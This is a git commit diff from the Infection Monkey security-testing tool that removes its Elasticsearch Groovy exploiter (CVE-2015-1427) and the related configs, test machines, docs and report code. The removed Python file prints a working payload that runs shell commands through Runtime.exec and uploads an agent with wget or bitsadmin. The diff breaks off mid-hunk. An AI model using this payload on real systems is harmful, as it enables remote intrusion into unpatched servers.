Merge pull request #1744 from guardicore/1732-remove-elasticsearch
Remove ElasticGroovyExploiter
This commit is contained in:
commit
0a7637c944
|
@ -46,6 +46,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- Agent bootloader. #1676
|
- Agent bootloader. #1676
|
||||||
- Zero Trust integration with ScoutSuite. #1669
|
- Zero Trust integration with ScoutSuite. #1669
|
||||||
- ShellShock exploiter. #1733
|
- ShellShock exploiter. #1733
|
||||||
|
- ElasticGroovy exploiter. #1732
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -47,7 +47,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
||||||
* SMB
|
* SMB
|
||||||
* WMI
|
* WMI
|
||||||
* Log4Shell
|
* Log4Shell
|
||||||
* Elastic Search (CVE-2015-1427)
|
* Zerologon
|
||||||
* Weblogic server
|
* Weblogic server
|
||||||
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
||||||
|
|
||||||
|
|
|
@ -1,13 +0,0 @@
|
||||||
---
|
|
||||||
title: "ElasticGroovy"
|
|
||||||
date: 2020-07-14T08:41:40+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "windows", "linux"]
|
|
||||||
---
|
|
||||||
### Description
|
|
||||||
|
|
||||||
CVE-2015-1427
|
|
||||||
|
|
||||||
> The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x (before 1.4.3) allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
|
|
||||||
|
|
||||||
The logic is based on the [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb).
|
|
|
@ -1,20 +0,0 @@
|
||||||
from copy import copy
|
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
|
||||||
|
|
||||||
|
|
||||||
class Elastic(ConfigTemplate):
|
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
|
||||||
|
|
||||||
config_values.update(
|
|
||||||
{
|
|
||||||
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
|
|
||||||
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
|
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
|
|
||||||
"basic_network.scope.depth": 1,
|
|
||||||
"internal.network.tcp_scanner.HTTP_PORTS": [9200],
|
|
||||||
"internal.network.tcp_scanner.tcp_target_ports": [],
|
|
||||||
}
|
|
||||||
)
|
|
|
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -2,8 +2,6 @@ GCP_TEST_MACHINE_LIST = {
|
||||||
"europe-west3-a": [
|
"europe-west3-a": [
|
||||||
"sshkeys-11",
|
"sshkeys-11",
|
||||||
"sshkeys-12",
|
"sshkeys-12",
|
||||||
"elastic-4",
|
|
||||||
"elastic-5",
|
|
||||||
"hadoop-2",
|
"hadoop-2",
|
||||||
"hadoop-3",
|
"hadoop-3",
|
||||||
"mssql-16",
|
"mssql-16",
|
||||||
|
|
|
@ -9,7 +9,6 @@ from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import Communicat
|
||||||
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||||
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
||||||
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
||||||
|
@ -190,9 +189,6 @@ class TestMonkeyBlackbox:
|
||||||
def test_drupal_exploiter(self, island_client):
|
def test_drupal_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
||||||
|
|
||||||
def test_elastic_exploiter(self, island_client):
|
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Elastic, "Elastic_exploiter")
|
|
||||||
|
|
||||||
def test_struts_exploiter(self, island_client):
|
def test_struts_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
||||||
|
|
||||||
|
@ -256,7 +252,7 @@ class TestMonkeyBlackbox:
|
||||||
)
|
)
|
||||||
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
def test_report_generation_performance(self, island_client, quick_performance_tests):
|
||||||
"""
|
"""
|
||||||
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
|
This test includes the SSH + Hadoop + MSSQL machines all in one test
|
||||||
for a total of 8 machines including the Monkey Island.
|
for a total of 8 machines including the Monkey Island.
|
||||||
|
|
||||||
Is has 2 analyzers - the regular one which checks all the Monkeys
|
Is has 2 analyzers - the regular one which checks all the Monkeys
|
||||||
|
|
|
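Review bot: The docstring of test_report_generation_performance is only half updated: the machine list drops "Elastic", but the next line still says `for a total of 8 machines including the Monkey Island.` while this same commit removes elastic-4 and elastic-5 from GCP_TEST_MACHINE_LIST and from the Performance template, so the count is presumably stale (6 if those two were part of it — worth confirming against the machine list). While touching the docstring, the unchanged context line `Is has 2 analyzers - the regular one which checks all the Monkeys` has a typo and should read `It has 2 analyzers - ...`. The body of test_report_generation_performance continues outside the hunk.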
@ -4,7 +4,6 @@ from typing import Type
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
||||||
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
|
||||||
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash
|
||||||
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr
|
||||||
|
@ -39,7 +38,6 @@ island_client = MonkeyIslandClient(args.island_ip)
|
||||||
|
|
||||||
|
|
||||||
CONFIG_TEMPLATES = [
|
CONFIG_TEMPLATES = [
|
||||||
Elastic,
|
|
||||||
Hadoop,
|
Hadoop,
|
||||||
Mssql,
|
Mssql,
|
||||||
Performance,
|
Performance,
|
||||||
|
|
|
@ -9,8 +9,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
|
||||||
[Machines](#machines)<br>
|
[Machines](#machines)<br>
|
||||||
[Nr. 2 Hadoop](#_Toc526517182)<br>
|
[Nr. 2 Hadoop](#_Toc526517182)<br>
|
||||||
[Nr. 3 Hadoop](#_Toc526517183)<br>
|
[Nr. 3 Hadoop](#_Toc526517183)<br>
|
||||||
[Nr. 4 Elastic](#_Toc526517184)<br>
|
|
||||||
[Nr. 5 Elastic](#_Toc526517185)<br>
|
|
||||||
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
|
[Nr. 9 Tunneling M1](#_Toc536021462)<br>
|
||||||
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
|
[Nr. 10 Tunneling M2](#_Toc536021463)<br>
|
||||||
[Nr. 11 SSH key steal](#_Toc526517190)<br>
|
[Nr. 11 SSH key steal](#_Toc526517190)<br>
|
||||||
|
@ -251,80 +249,6 @@ Update all requirements using deployment script:<br>
|
||||||
</tbody>
|
</tbody>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc526517184" class="anchor"></span>Nr. <strong>4</strong> Elastic</p>
|
|
||||||
<p>(10.2.2.4)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p><a href="https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-2">Elastic 1.4.2</a></p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>9200</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Scan results:</td>
|
|
||||||
<td>Machine exploited using Elastic exploiter</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td><a href="https://www.elastic.co/guide/en/elasticsearch/reference/1.4/_index_and_query_a_document.html">Quick</a> tutorial on how to add entries (was useful when setting up).</td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc526517185" class="anchor"></span>Nr. <strong>5</strong> Elastic</p>
|
|
||||||
<p>(10.2.2.5)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Windows 10 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p><a href="https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-2">Elastic 1.4.2</a></p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>9200</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Scan results:</td>
|
|
||||||
<td>Machine exploited using Elastic exploiter</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td><a href="https://www.elastic.co/guide/en/elasticsearch/reference/1.4/_index_and_query_a_document.html">Quick</a> tutorial on how to add entries (was useful when setting up).</td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
<table>
|
||||||
<thead>
|
<thead>
|
||||||
<tr class="header">
|
<tr class="header">
|
||||||
|
|
|
@ -7,14 +7,6 @@ data "google_compute_image" "hadoop-3" {
|
||||||
name = "hadoop-3"
|
name = "hadoop-3"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
}
|
}
|
||||||
data "google_compute_image" "elastic-4" {
|
|
||||||
name = "elastic-4"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "elastic-5" {
|
|
||||||
name = "elastic-5"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "tunneling-9" {
|
data "google_compute_image" "tunneling-9" {
|
||||||
name = "tunneling-9"
|
name = "tunneling-9"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
|
|
|
@ -76,36 +76,6 @@ resource "google_compute_instance_from_template" "hadoop-3" {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "elastic-4" {
|
|
||||||
name = "${local.resource_prefix}elastic-4"
|
|
||||||
source_instance_template = local.default_ubuntu
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.elastic-4.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.4"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "elastic-5" {
|
|
||||||
name = "${local.resource_prefix}elastic-5"
|
|
||||||
source_instance_template = local.default_windows
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.elastic-5.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.5"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "tunneling-9" {
|
resource "google_compute_instance_from_template" "tunneling-9" {
|
||||||
name = "${local.resource_prefix}tunneling-9"
|
name = "${local.resource_prefix}tunneling-9"
|
||||||
source_instance_template = local.default_ubuntu
|
source_instance_template = local.default_ubuntu
|
||||||
|
|
|
@ -27,7 +27,6 @@
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -1,114 +0,0 @@
|
||||||
"""
|
|
||||||
Implementation is based on elastic search groovy exploit by metasploit
|
|
||||||
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
|
|
||||||
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
|
|
||||||
Max vulnerable elasticsearch version is "1.4.2"
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
|
|
||||||
import requests
|
|
||||||
|
|
||||||
from common.common_consts.network_consts import ES_SERVICE
|
|
||||||
from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus
|
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
|
||||||
from infection_monkey.model import (
|
|
||||||
BITSADMIN_CMDLINE_HTTP,
|
|
||||||
CHECK_COMMAND,
|
|
||||||
CMD_PREFIX,
|
|
||||||
DOWNLOAD_TIMEOUT,
|
|
||||||
ID_STRING,
|
|
||||||
WGET_HTTP_UPLOAD,
|
|
||||||
)
|
|
||||||
from infection_monkey.network_scanning.elasticfinger import ES_PORT
|
|
||||||
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
|
|
||||||
class ElasticGroovyExploiter(WebRCE):
|
|
||||||
# attack URLs
|
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
|
||||||
GENERIC_QUERY = (
|
|
||||||
"""{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
|
|
||||||
)
|
|
||||||
JAVA_CMD = GENERIC_QUERY % (
|
|
||||||
"""java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec("""
|
|
||||||
"""\\"%s\\").getText()"""
|
|
||||||
)
|
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
|
||||||
_EXPLOITED_SERVICE = "Elastic search"
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
|
||||||
|
|
||||||
def get_exploit_config(self):
|
|
||||||
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
|
||||||
exploit_config["dropper"] = True
|
|
||||||
exploit_config["url_extensions"] = ["_search?pretty"]
|
|
||||||
exploit_config["upload_commands"] = {
|
|
||||||
"linux": WGET_HTTP_UPLOAD,
|
|
||||||
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
|
|
||||||
}
|
|
||||||
return exploit_config
|
|
||||||
|
|
||||||
def get_open_service_ports(self, port_list, names):
|
|
||||||
# We must append elastic port we get from elastic fingerprint module because It's not
|
|
||||||
# marked as 'http' service
|
|
||||||
valid_ports = WebRCE.get_open_service_ports(self.host, port_list, names)
|
|
||||||
if ES_SERVICE in self.host.services:
|
|
||||||
valid_ports.append([ES_PORT, False])
|
|
||||||
return valid_ports
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
|
||||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
|
||||||
payload = self.JAVA_CMD % command
|
|
||||||
try:
|
|
||||||
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
|
|
||||||
except requests.ReadTimeout:
|
|
||||||
logger.error(
|
|
||||||
"Elastic couldn't upload monkey, because server didn't respond to upload "
|
|
||||||
"request."
|
|
||||||
)
|
|
||||||
return False
|
|
||||||
result = self.get_results(response)
|
|
||||||
if not result:
|
|
||||||
return False
|
|
||||||
return result[0]
|
|
||||||
|
|
||||||
def upload_monkey(self, url, commands=None):
|
|
||||||
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
|
|
||||||
if "windows" in self.host.os["type"] and result:
|
|
||||||
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
|
|
||||||
return result
|
|
||||||
|
|
||||||
def get_results(self, response):
|
|
||||||
"""
|
|
||||||
Extracts the result data from our attack
|
|
||||||
:return: List of data fields or None
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
json_resp = json.loads(response.text)
|
|
||||||
return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD]
|
|
||||||
except (KeyError, IndexError):
|
|
||||||
return None
|
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
|
||||||
# Overridden web_rce method that adds CMD prefix for windows command
|
|
||||||
try:
|
|
||||||
if "windows" in self.host.os["type"]:
|
|
||||||
resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
|
|
||||||
else:
|
|
||||||
resp = self.exploit(url, CHECK_COMMAND)
|
|
||||||
if resp is True:
|
|
||||||
return True
|
|
||||||
elif resp is not False and ID_STRING in resp:
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
except Exception as e:
|
|
||||||
logger.error("Host's exploitability check failed due to: %s" % e)
|
|
||||||
return False
|
|
|
@ -18,7 +18,6 @@ BASIC = {
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Log4ShellExploiter",
|
"Log4ShellExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/sshexec/",
|
"/exploiters/sshexec/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["ElasticGroovyExploiter"],
|
|
||||||
"title": "ElasticGroovy Exploiter",
|
|
||||||
"safe": True,
|
|
||||||
"info": "CVE-2015-1427. Logic is based on Metasploit module.",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
|
|
||||||
"/elasticgroovy/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["Struts2Exploiter"],
|
"enum": ["Struts2Exploiter"],
|
||||||
|
|
|
@ -69,7 +69,6 @@ class AWSExporter(Exporter):
|
||||||
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
|
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
|
||||||
},
|
},
|
||||||
"tunnel": AWSExporter._handle_tunnel_issue,
|
"tunnel": AWSExporter._handle_tunnel_issue,
|
||||||
ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
|
|
||||||
ExploiterDescriptorEnum.SMB.value.class_name: {
|
ExploiterDescriptorEnum.SMB.value.class_name: {
|
||||||
CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue,
|
CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue,
|
||||||
CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue,
|
CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue,
|
||||||
|
@ -245,21 +244,6 @@ class AWSExporter(Exporter):
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||||
)
|
)
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def _handle_elastic_issue(issue, instance_arn):
|
|
||||||
|
|
||||||
return AWSExporter._build_generic_finding(
|
|
||||||
severity=10,
|
|
||||||
title="Elastic Search servers are vulnerable to CVE-2015-1427",
|
|
||||||
description="Update your Elastic Search server to version 1.4.3 and up.",
|
|
||||||
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. "
|
|
||||||
"The attack was made "
|
|
||||||
"possible because the Elastic Search server was not patched "
|
|
||||||
"against CVE-2015-1427.".format(issue["machine"], issue["ip_address"]),
|
|
||||||
instance_arn=instance_arn,
|
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
|
||||||
)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _handle_island_cross_segment_issue(issue, instance_arn):
|
def _handle_island_cross_segment_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
|
|
@ -28,9 +28,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
||||||
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
||||||
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
||||||
ELASTIC = ExploiterDescriptor(
|
|
||||||
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
|
||||||
)
|
|
||||||
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
||||||
WEBLOGIC = ExploiterDescriptor(
|
WEBLOGIC = ExploiterDescriptor(
|
||||||
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
||||||
|
|
|
@ -27,7 +27,6 @@ import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue
|
||||||
import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
|
import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
|
||||||
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
|
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
|
||||||
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
|
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
|
||||||
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
|
||||||
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
||||||
import {
|
import {
|
||||||
crossSegmentIssueOverview,
|
crossSegmentIssueOverview,
|
||||||
|
@ -119,11 +118,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
},
|
},
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'ElasticGroovyExploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: elasticIssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: elasticIssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'PowerShellExploiter': {
|
'PowerShellExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
||||||
|
|
|
@ -1,23 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function elasticIssueOverview() {
|
|
||||||
return (<li>Elasticsearch servers are vulnerable to <a
|
|
||||||
href="https://www.cvedetails.com/cve/cve-2015-1427">CVE-2015-1427</a>.
|
|
||||||
</li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function elasticIssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Update your Elastic Search server to version 1.4.3 and up.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to an <span
|
|
||||||
className="badge badge-danger">Elastic Groovy</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -54,7 +54,6 @@
|
||||||
],
|
],
|
||||||
"vulnerability": [
|
"vulnerability": [
|
||||||
{"name": "DrupalExploiter"},
|
{"name": "DrupalExploiter"},
|
||||||
{"name": "ElasticGroovyExploiter"},
|
|
||||||
{"name": "HadoopExploiter"},
|
{"name": "HadoopExploiter"},
|
||||||
{"name": "ShellShockExploiter"},
|
{"name": "ShellShockExploiter"},
|
||||||
{"name": "Struts2Exploiter"},
|
{"name": "Struts2Exploiter"},
|
||||||
|
|
|
@ -52,7 +52,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"ZerologonExploiter",
|
"ZerologonExploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
|
|
|
@ -5,7 +5,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
"Struts2Exploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -27,9 +27,9 @@ SCAN_DATA_MOCK = [
|
||||||
EXPLOIT_DATA_MOCK = [
|
EXPLOIT_DATA_MOCK = [
|
||||||
{
|
{
|
||||||
"result": True,
|
"result": True,
|
||||||
"exploiter": "ElasticGroovyExploiter",
|
